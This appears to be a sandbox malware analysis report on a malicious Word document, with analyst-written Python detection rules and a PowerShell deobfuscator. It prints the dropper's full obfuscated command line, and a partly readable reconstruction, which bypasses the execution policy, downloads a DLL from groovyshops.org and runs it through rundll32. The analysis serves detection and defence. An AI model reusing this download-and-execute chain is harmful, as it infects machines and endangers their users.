PID 2284 wrote to memory of 2888 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 3040 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe C:\Windows\SysWOW64\rundll32.exe
PID 3040 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe C:\Windows\SysWOW64\rundll32.exe
PID 3040 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe C:\Windows\SysWOW64\rundll32.exe
PID 3040 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe C:\Windows\SysWOW64\rundll32.exe
PID 3040 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe C:\Windows\SysWOW64\rundll32.exe
PID 3040 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe C:\Windows\SysWOW64\rundll32.exe
PID 3040 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe C:\Windows\SysWOW64\rundll32.exe
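
Analyst note (added to this page; not part of the sandbox output). The parent/child edges recorded above, WINWORD.EXE (2284) starting xea_kueou0.exe (3040) and splwow64.exe (2888), and xea_kueou0.exe (3040) starting rundll32.exe (1384), are the part of this report that turns into detection rules. splwow64.exe is the 32-bit to 64-bit printer-driver thunking host that 32-bit Office routinely starts on 64-bit Windows and is benign noise; the other two edges are the detection surface. What follows is example detection logic written for this page, not Triage's signature code. It runs over process-creation events constructed from the Processes section of this report; the WINWORD.EXE parent PID (1000) is an assumption, and the xea_kueou0.exe command line is a 12-fragment stand-in for the very long one in the report.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "mspub.exe"}
# Per-user, user-writable locations; Office has no business launching binaries from here.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\AppData\\(?:Local|LocalLow|Roaming)\\",
                           re.IGNORECASE)
# Ten or more '$frag+' terms feeding Invoke-Expression: fragment-concatenation obfuscation.
IEX_CONCAT = re.compile(r"Invoke-Expression\s*\((?:\s*\$\w+\s*\+){10,}", re.IGNORECASE)


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str

    @property
    def name(self) -> str:
        return self.image.rsplit("\\", 1)[-1].lower()


def detect(events: List[ProcEvent]) -> List[Tuple[str, int]]:
    """Return (rule, pid) findings for the process-creation events of one detonation."""
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    findings: List[Tuple[str, int]] = []
    for e in events:
        parent: Optional[ProcEvent] = by_pid.get(e.ppid)
        # Rule 1: an Office application started an executable from a user-writable directory.
        if parent and parent.name in OFFICE_IMAGES and USER_WRITABLE.search(e.image):
            findings.append(("office_spawns_exe_from_user_dir", e.pid))
        # Rule 2: keyed on the command line, so a renamed powershell.exe does not evade it.
        if IEX_CONCAT.search(e.cmdline):
            findings.append(("iex_fragment_concat", e.pid))
        # Rule 3: rundll32 loading a DLL from AppData; note whether Office is two levels up.
        if e.name == "rundll32.exe":
            m = re.search(r"rundll32\.exe\"?\s+(\S+\.dll)\b", e.cmdline, re.IGNORECASE)
            if m and USER_WRITABLE.search(m.group(1)):
                grand = by_pid.get(parent.ppid) if parent else None
                via_office = bool(grand and grand.name in OFFICE_IMAGES)
                rule = "rundll32_dll_from_appdata" + ("_office_lineage" if via_office else "")
                findings.append((rule, e.pid))
    return findings


# Events constructed from the report's Processes section (see the assumptions in the
# note above: parent PID 1000 and the shortened Invoke-Expression command line).
_IEX_STANDIN = (
    r"C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe "
    + "".join("$v%d='x';" % i for i in range(12))
    + " Invoke-Expression (" + "+".join("$v%d" % i for i in range(12)) + ");"
)
SAMPLE_EVENTS = [
    ProcEvent(2284, 1000, r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE",
              r'"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n '
              r'"C:\Users\Admin\AppData\Local\Temp\5d26fff174b5864a0fd899ccb8c9a3fb_JaffaCakes118.doc"'),
    ProcEvent(3040, 2284, r"C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe", _IEX_STANDIN),
    ProcEvent(2888, 2284, r"C:\Windows\splwow64.exe", r"C:\Windows\splwow64.exe 12288"),
    ProcEvent(1384, 3040, r"C:\Windows\SysWOW64\rundll32.exe",
              r'"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\etase.dll f1'),
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(rule, pid)
```

Rule 2 deliberately ignores the image name: the binary in %TEMP%\gxeofiu is not called powershell.exe, so an image-based "Office spawns PowerShell" rule would miss it, while the Invoke-Expression fragment sink is in the command line regardless of what the host binary is named.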

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5d26fff174b5864a0fd899ccb8c9a3fb_JaffaCakes118.doc"

C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe

C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe $oaibfxvjiowlxxw_iekfpfyiuuoycid='org/CJ';$natpxmhofkbbeb_huseueei='ojqa';$owaizbpyuaoyyawtzcwqygabpqsrqeeidno4=' =';$eikoia_yblegbmybniemxea_ogwepz='e]$ojqa0';$mdroaenb_esuwo='ient).';$wvmbvwoxkjuhjt='($env:a';$mzoiuddeyajlqncmnrvpotqghzbopauau='($';$tcozygiwfcyinfvnu_euqaocnlecylzi='br';$qcyeatbinwxsmezc_hmhviayrcnolalvknuiefhjf='+ ''';$aoauapzujgioje_xidu_aaibeabsc87='.php';$okeygvmueodiuuyuz='Net';$yitmzuozoufzu_lficf_gdhpoeuqao2='$env:t';$sgagyyoabqaaaioi='k;}}Se';$cfruonrvvuhve_ixrbnpdclveyouklainlriu=' $path=';$aooajmeeiyupyyusaqxznw='Downl';$yamzywruogbpvbyuunmq97=' -Sc';$mwyzyn_vhaa_gzewtucmxgu='a+''\';$udm_ug_rphwvtreioe_jtneafrollnf_xjuwpzz='ea';$gvsudskwuyopb_kekkatmqpdqasgaegjhsvki=''',$pat';$vbsif_aeknkgtcrajatpyktombewksswo='t-';$mmwsme_kyvxu_edvejwrrwdtvuseduio_lnwi_es='%s';$ua_wybbegalseqrkkigmuueik='rmat ';$bxauxi_gdiqlvelokehc=');(Ne';$iu_ebbubieeuynqayu_rcpfykziuepqojd02='.Webcl';$ubgieohxfasnveuauyunvnyyafalf_tuf='ct S';$rlhio_vzhdxeytzwdajcaio='lcn';$c_qwtnvmm_mwitcyidseg=') -';$uymddyuwrfj_truyyqv=' = $';$ieaetbrqnosgobb='xeofiu''';$ulhqbioxuairmxscoeywdo='\g';$iiqjwpysluziyi='h); rund';$fm_lzloaflyqunl_rrvjpmd=' Ge';$kayrdaavkijoqmiiieadeowqbw='oad';$s_bvcqmepdogzwmoqwr_uscmigyassarl='; $qgyx';$uso_dl_vwzkeeskgpp_ibvewjmr='uCokZbLZ';$atke_aahgy_awuhinj_yarqjoiagbdomxcm='Ex';$ytr_ulakmoxieyuuqsa='ope P';$wmqaligua_xjensemze='le(';$uziux_cxljaau='olic';$qdkp_tslelwso_iuwnaby_np='11;whi';$upfihhmu_bruiaypxwc_nzfkbtrgtx_yujyep_jxyuu5='ate -UFo';$oauwfabx_dhpjo_iodh_ulpunmfktuavteai=' ''f1'';Re';$wtoxtvoiougt_y='re';$byadiryyayieeidgqqmjrgeactagkrpexhu='emp ';$bqgddecgsiiajzoourpmbdeayguxj='cur';$sq_aqnpeltdkhy_idwjrpgmqq_ufzty='et-Da';$ijfkefmziiwkqqxy='shops.';$ydndgjo_eeopr_fdjdezhomjqqeyeeyeyu_qb='File(''';$idrypqufftaiazps='yste';$egxtowvvxgkzyeykhonizpgwa_rjoeuanpo=' $path ,';$fsyy_cy_ydewla_a_yeifzavusld_e='ll32';$txjyexcuyf_moyzdaaylgqru='ecutionP';$aef_noyxiax_puskee='ad = 
G';$brraekqxipsc_u='m 4';$acgyap_iqwholxtyekmd_xoayczaumoao='0 + 11.';$tmi_hibeeyaxhueiswapcwr='y Bypass';$e_utyoesneikpukijvwxeamahf_ii='t-D';$gdzgogct_uzouwzezekvialzuqoi='ase.dll''';$uy_aywtlioixpgipyixqufajvjnfk_a='et';$kzfwuwzbhtztiihor_rhaiscfboclhe='77;if';$qpb_elgvzsl_iqmfch='lcnad -g';$kgeyoiapuoiutzvlkft_f_bnbmioasyv='eep -';$uiieeutyymuyscizu62='){';$cnyjzkyeff_uobpdkcas='t-Sl';$ei_oefjuuyalgvsyjxnewacxtxr='tem (';$iivobpybzsthaoopoisugotiiiieduhhr08='rmat';$jptjeey_kzmhoaosrugpervewfwzsvvs='[doubl';$xknnmepjaanpebhypu='ppdat';$igeoekzbisdoztezqosdyeuokg='1){ $';$vxzopznvaorxujcbx='te -UFo';$p_lmbqvpyzegfzwimu='w-Obje';$pstxzidydhkykpkknua='m.';$ieenx_au_yycve_svmhohfeaxessifksygx='se -forc';$alfwlkamnera=' %s;Star';$ao_mbuayqujiyyapwsniiue='move-I';$wcfdjjedlijj0='//groovy';$somgplgrotbymcrajk_y='e;';$yagwueilv_uavozttcstoizd_vlvgm_ia_uvjhahrp='rocess;';$lzbwawc_sfiygjoyuucrzy_aii='http:';$auijlrquyuonww_xotmtfapkxbzyaoeea64='e $qgyx'; Invoke-Expression ($jptjeey_kzmhoaosrugpervewfwzsvvs+$eikoia_yblegbmybniemxea_ogwepz+$owaizbpyuaoyyawtzcwqygabpqsrqeeidno4+$fm_lzloaflyqunl_rrvjpmd+$e_utyoesneikpukijvwxeamahf_ii+$upfihhmu_bruiaypxwc_nzfkbtrgtx_yujyep_jxyuu5+$ua_wybbegalseqrkkigmuueik+$mmwsme_kyvxu_edvejwrrwdtvuseduio_lnwi_es+$s_bvcqmepdogzwmoqwr_uscmigyassarl+$uymddyuwrfj_truyyqv+$natpxmhofkbbeb_huseueei+$acgyap_iqwholxtyekmd_xoayczaumoao+$qdkp_tslelwso_iuwnaby_np+$wmqaligua_xjensemze+$igeoekzbisdoztezqosdyeuokg+$rlhio_vzhdxeytzwdajcaio+$aef_noyxiax_puskee+$sq_aqnpeltdkhy_idwjrpgmqq_ufzty+$vxzopznvaorxujcbx+$iivobpybzsthaoopoisugotiiiieduhhr08+$alfwlkamnera+$cnyjzkyeff_uobpdkcas+$kgeyoiapuoiutzvlkft_f_bnbmioasyv+$brraekqxipsc_u+$kzfwuwzbhtztiihor_rhaiscfboclhe+$mzoiuddeyajlqncmnrvpotqghzbopauau+$qpb_elgvzsl_iqmfch+$auijlrquyuonww_xotmtfapkxbzyaoeea64+$uiieeutyymuyscizu62+$tcozygiwfcyinfvnu_euqaocnlecylzi+$udm_ug_rphwvtreioe_jtneafrollnf_xjuwpzz+$sgagyyoabqaaaioi+$vbsif_aeknkgtcrajatpyktombewksswo+$atke_aahgy_awuhinj_yarqjoiagbdomxcm+$txjyexcuyf_moyzdaaylg
qru+$uziux_cxljaau+$tmi_hibeeyaxhueiswapcwr+$yamzywruogbpvbyuunmq97+$ytr_ulakmoxieyuuqsa+$yagwueilv_uavozttcstoizd_vlvgm_ia_uvjhahrp+$cfruonrvvuhve_ixrbnpdclveyouklainlriu+$wvmbvwoxkjuhjt+$xknnmepjaanpebhypu+$mwyzyn_vhaa_gzewtucmxgu+$uy_aywtlioixpgipyixqufajvjnfk_a+$gdzgogct_uzouwzezekvialzuqoi+$bxauxi_gdiqlvelokehc+$p_lmbqvpyzegfzwimu+$ubgieohxfasnveuauyunvnyyafalf_tuf+$idrypqufftaiazps+$pstxzidydhkykpkknua+$okeygvmueodiuuyuz+$iu_ebbubieeuynqayu_rcpfykziuepqojd02+$mdroaenb_esuwo+$aooajmeeiyupyyusaqxznw+$kayrdaavkijoqmiiieadeowqbw+$ydndgjo_eeopr_fdjdezhomjqqeyeeyeyu_qb+$lzbwawc_sfiygjoyuucrzy_aii+$wcfdjjedlijj0+$ijfkefmziiwkqqxy+$oaibfxvjiowlxxw_iekfpfyiuuoycid+$uso_dl_vwzkeeskgpp_ibvewjmr+$aoauapzujgioje_xidu_aaibeabsc87+$gvsudskwuyopb_kekkatmqpdqasgaegjhsvki+$iiqjwpysluziyi+$fsyy_cy_ydewla_a_yeifzavusld_e+$egxtowvvxgkzyeykhonizpgwa_rjoeuanpo+$oauwfabx_dhpjo_iodh_ulpunmfktuavteai+$ao_mbuayqujiyyapwsniiue+$ei_oefjuuyalgvsyjxnewacxtxr+$yitmzuozoufzu_lficf_gdhpoeuqao2+$byadiryyayieeidgqqmjrgeactagkrpexhu+$qcyeatbinwxsmezc_hmhviayrcnolalvknuiefhjf+$ulhqbioxuairmxscoeywdo+$ieaetbrqnosgobb+$c_qwtnvmm_mwitcyidseg+$wtoxtvoiougt_y+$bqgddecgsiiajzoourpmbdeayguxj+$ieenx_au_yycve_svmhohfeaxessifksygx+$somgplgrotbymcrajk_y);

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\etase.dll f1
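
Analyst note (added to this page; not part of the sandbox output). The xea_kueou0.exe command line above is PowerShell: a few dozen string fragments are assigned to randomly named variables out of order, with embedded quotes doubled, and a single Invoke-Expression glues them back together in the right order. The de-DE\about_*.help.txt files dropped next to it are PowerShell's localized help files, which is consistent with %TEMP%\gxeofiu being a copy of the WindowsPowerShell\v1.0 directory with powershell.exe renamed to xea_kueou0.exe; the report's hashes do not confirm that, so treat it as an inference. Read back by hand from the fragments, the command line assembles to: a polling loop that waits roughly 11 seconds (Get-Date -UFormat %s, Start-Sleep -m 477 until the epoch time passes the start value plus 11.11), Set-ExecutionPolicy Bypass -Scope Process, a System.Net.Webclient DownloadFile of http://groovyshops.org/CJuCokZbLZ.php to $env:appdata\etase.dll, rundll32 $path ,'f1' (the rundll32.exe line above, export f1), and Remove-Item ($env:temp + '\gxeofiu') -recurse -force to delete the staging directory. The Network table below records only the DNS lookup for groovyshops.org. The deobfuscator below is example code written for this page, not Triage's; it resolves this fragment-concatenation pattern generically and pulls the indicators out of the result. Its sample input is constructed to mirror the report's command line, cut down to eight fragments; the URL, paths and export name in it are the ones in the report.

```python
import re

# $name='literal'  -- PowerShell single-quoted string; a quote inside it is doubled ('').
_ASSIGN = re.compile(r"\$([A-Za-z_][A-Za-z0-9_]*)\s*=\s*'((?:[^']|'')*)'")
# Invoke-Expression ($frag1+$frag2+...+$fragN)  -- the sink that runs the glued text.
_IEX_SINK = re.compile(
    r"Invoke-Expression\s*\(\s*((?:\$[A-Za-z0-9_]+\s*\+\s*)*\$[A-Za-z0-9_]+)\s*\)",
    re.IGNORECASE)


def deobfuscate_concat_iex(cmdline: str) -> str:
    """Resolve the string-fragment + Invoke-Expression pattern to the script it runs."""
    # The report prints the command line wrapped across lines; a line break never belongs
    # inside a fragment name, so the pieces are joined first (assumption: wrapped text).
    cmdline = re.sub(r"\r?\n", "", cmdline)
    fragments = {name: raw.replace("''", "'") for name, raw in _ASSIGN.findall(cmdline)}
    sink = _IEX_SINK.search(cmdline)
    if sink is None:
        raise ValueError("no Invoke-Expression(<fragments>) sink found")
    order = re.findall(r"\$([A-Za-z0-9_]+)", sink.group(1))
    missing = [n for n in order if n not in fragments]
    if missing:
        raise ValueError("fragments referenced but never assigned: %s" % missing)
    return "".join(fragments[n] for n in order)


def extract_iocs(script: str) -> dict:
    """Pull network, file-system and execution indicators out of the resolved script."""
    urls = re.findall(r"https?://[^\s'\"),]+", script)
    # $env:appdata+'\etase.dll'  ->  %APPDATA%\etase.dll
    paths = ["%%%s%%%s" % (env.upper(), lit)
             for env, lit in re.findall(r"\$env:(\w+)\s*\+\s*'([^']*)'", script)]
    rundll = re.findall(r"rundll32\s+(\S+)\s*,\s*'?([A-Za-z0-9_#]+)'?", script, re.IGNORECASE)
    delay = re.search(r"Start-Sleep", script, re.IGNORECASE) is not None
    return {"urls": urls, "paths": paths, "rundll32": rundll, "sleep_loop": delay}


# Constructed sample: same layout as the report's xea_kueou0.exe command line
# (out-of-order fragments, doubled quotes, one Invoke-Expression sink), eight fragments.
SAMPLE_CMDLINE = (
    r"C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe "
    r"$f3='ppdata+''\et';$f1='Set-Exec';"
    r"$f0='[double]$t0 = Get-Date -UFormat %s; $until = $t0 + 11.11;"
    r"while(1){ $now = Get-Date -UFormat %s;Start-Sleep -m 477;if($now -ge $until){break;}}';"
    r"$f6='shops.org/CJuCokZbLZ.php'',$path); rundll32 $path ,''f1'';';"
    r"$f4='ase.dll'');(New-Object System.Net.Webclient).DownloadFile(''';"
    r"$f2='utionPolicy Bypass -Scope Process; $path=($env:a';$f5='http://groovy';"
    r"$f7='Remove-Item ($env:temp + ''\gxeofiu'') -recurse -force;';"
    r" Invoke-Expression ($f0+$f1+$f2+$f3+$f4+$f5+$f6+$f7);"
)

if __name__ == "__main__":
    resolved = deobfuscate_concat_iex(SAMPLE_CMDLINE)
    print(resolved)
    print(extract_iocs(resolved))
```

To run it over the real command line, paste the text of the xea_kueou0.exe entry above (including its wrapped continuation lines) as the input; nothing in the script is executed, the fragments are only concatenated in the order the Invoke-Expression argument names them.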

Network

Country Destination Domain Proto
US 8.8.8.8:53 groovyshops.org udp

Files

memory/2284-0-0x000000002FBA1000-0x000000002FBA2000-memory.dmp

memory/2284-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2284-2-0x0000000070B8D000-0x0000000070B98000-memory.dmp

memory/2284-5-0x0000000000450000-0x0000000000550000-memory.dmp

memory/2284-6-0x0000000000450000-0x0000000000550000-memory.dmp

memory/2284-7-0x0000000000450000-0x0000000000550000-memory.dmp

memory/2284-8-0x0000000000450000-0x0000000000550000-memory.dmp

\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe

MD5 92f44e405db16ac55d97e3bfe3b132fa
SHA1 04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA256 6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512 f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_remote_output.help.txt

MD5 2d02f5a7e119b47f65ffec2b0d964b8f
SHA1 d7001e1a383d8dd6d95083e8402b72c0a35ebb29
SHA256 69acbd84619353baab030891edc5b5bd572d71ac4aaf79aa3abc0035baf1d901
SHA512 f7412522b3ba45f0f926ee072f1358d1cc2d8a1faf8e883d134fae47de82064e5be3f50955ecb9333683ea135af38d043e0845501185a3e2816afa175721ca86

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_remote_jobs.help.txt

MD5 14c40e004e30570838666afb9d3e0ac7
SHA1 525b5b40939ba7783c9ee30abc9ec22d39b164ac
SHA256 0e5e2f9648031ccdec84e092411833180df9a2caf85c7d56bb2339dc42462747
SHA512 e32a88ac639be91787eb6690fc9a215abb7b1e720265de70150e67a08fdf22187242794c5096c2ab2a4568cf8c4f973a6ece1083724f24c1f864c82794bb07f3

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_remote_FAQ.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_remote.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_regular_expressions.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Ref.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Redirection.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Quoting_Rules.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_PSSnapins.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_pssession_details.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_pssessions.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_providers.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_properties.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_prompts.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_profiles.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_preference_variables.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_pipelines.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Path_Syntax.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Parsing.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_parameters.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_operators.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_objects.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_modules.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_methods.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_logical_operators.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_locations.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Line_Editing.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Language_Keywords.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_join.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_job_details.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_jobs.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_If.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_History.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_hash_tables.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_functions_cmdletbindingattribute.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_functions_advanced_parameters.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_functions_advanced_methods.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_functions_advanced.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_functions.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_format.ps1xml.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Foreach.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_For.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_execution_policies.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_eventlogs.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_escape_characters.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_environment_variables.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_do.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_debuggers.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_data_sections.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Core_Commands.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Continue.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Comparison_Operators.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_CommonParameters.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Comment_Based_Help.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Command_Syntax.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_command_precedence.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Break.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Automatic_Variables.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Assignment_Operators.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_arrays.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Arithmetic_Operators.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_aliases.help.txt

memory/2284-745-0x0000000070B8D000-0x0000000070B98000-memory.dmp

memory/2284-746-0x0000000000450000-0x0000000000550000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

memory/2284-761-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2284-762-0x0000000070B8D000-0x0000000070B98000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-20 04:19

Reported

2024-05-20 04:22

Platform

win10v2004-20240508-en

Max time kernel

145s

Max time network

127s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5d26fff174b5864a0fd899ccb8c9a3fb_JaffaCakes118.doc" /o ""

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5d26fff174b5864a0fd899ccb8c9a3fb_JaffaCakes118.doc" /o ""

C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\etase.dll f1

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 99.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 46.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
NL 52.109.89.19:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 19.89.109.52.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 5.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 groovyshops.org udp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
NL 23.62.61.184:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 184.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 200.14.97.104.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
